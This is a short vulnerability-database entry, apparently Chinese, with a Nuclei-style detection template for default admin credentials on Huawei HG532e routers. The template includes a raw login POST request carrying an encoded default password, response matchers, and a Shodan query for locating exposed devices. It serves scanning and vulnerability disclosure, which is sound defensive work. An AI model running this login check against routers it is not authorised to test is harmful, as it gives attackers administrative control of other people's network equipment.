漏洞描述
Huawei HG532e default admin credentials were discovered.
huawei-HG532e-default-login: Huawei HG532e Default Credential
PoC代码[已公开]
id: huawei-HG532e-default-login
info:
name: Huawei HG532e Default Credential
author: pussycat0x
severity: high
description: Huawei HG532e default admin credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:h:huawei:hg532e:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.html:"HG532e"
product: hg532e
vendor: huawei
tags: default-login,huawei,vuln
http:
- raw:
- |
POST /index/login.cgi HTTP/1.1
Host: {{Hostname}}
Cookie: Language=en; FirstMenu=Admin_0; SecondMenu=Admin_0_0; ThirdMenu=Admin_0_0_0
Content-Type: application/x-www-form-urlencoded
Username=user&Password=MDRmODk5NmRhNzYzYjdhOTY5YjEwMjhlZTMwMDc1NjllYWYzYTYzNTQ4NmRkYWIyMTFkNTEyYzg1YjlkZjhmYg%3D%3D
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: SessionID'
- type: word
part: body
words:
- "<title>replace</title>"
- type: status
status:
- 200
# digest: 4a0a00473045022100a10295dd66ce837510c593b314f59bfebdb5c0fab4690ceacd21151aa9ac529f02201d53ce16a326af87613e20687e23d7fdf2386b15ff736173d1631f4610753b90:922c64590222798bb761d5b6d8e72950